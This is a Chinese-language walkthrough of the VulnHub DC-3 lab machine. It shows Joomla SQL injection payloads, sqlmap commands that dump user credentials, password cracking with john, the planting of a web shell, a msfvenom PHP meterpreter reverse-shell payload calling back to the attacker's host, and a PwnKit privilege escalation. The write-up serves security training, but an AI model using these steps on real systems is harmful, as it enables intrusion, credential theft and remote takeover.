vulnhub dc-3渗透

1.扫描存活主机，发现存货主机192.168.85.174

nmap 192.168.85.0/24

2.扫描端口,发现只开放了80端口

nmap -p1-65535 192.168.85.174

3.扫描服务版本信息

nma -sV 192.168.85.174

4.访问网站，发现cms为joomla

网站中有一段提示，是这个靶机只有一个flag，也就是在root目录下的flag
5.在网络上搜索joomla相关漏洞
msf尝试各种exp失败了
通过扫描(auxiliary/scanner/http/joomla_version) 知道了版本是3.7.0
找到两个相关漏洞 反序列化 rce(CVE-2015-8562 ) sql注入(CVE-2017-8917)
尝试反序列化 rce失败
sql注入
payload：

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,database()),1)

发现可以查出数据库

后面如果手工注入查字段会出现问题，因为有个表名’#__users’,使用单引号会出现报错，有转义符
使用sqlmap进行注入
查对应的表名

python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb --tables --batch

查#__users的字段

`python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users --columns`

查数据

python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users -C username,password --dump

6.使用john破解密码
把密码写入1.txt

vim 1.txt
john 1.txt

破解出密码是spoony

7.扫描目录,登录后台

dirb http://192.168.85.174/

扫出关键目录administrator目录

8.找对应的改源码地方
在下方位置可以修改源码


写入一句话木马，保存
蚁剑连接，上传msf木马
发现执行失败，可能是权限的问题
使用msf生成php的木马

 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.85.129 lport=4444 -f raw  -o 1.php   

把1.php的代码复制到网站源码中，保存，访问
监听

use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0.
run

成功收到会话

9.提权
上传漏洞探测脚本，发现cve-2021-4034

只要安装这个工具，就可能存在漏洞

 dpkg -l policykit-1    #查看是否安装了pwnkit

上传exp

make
./cve-2021-4034

成功提权

查看flag

参考文章：
joomla漏洞
dc-3渗透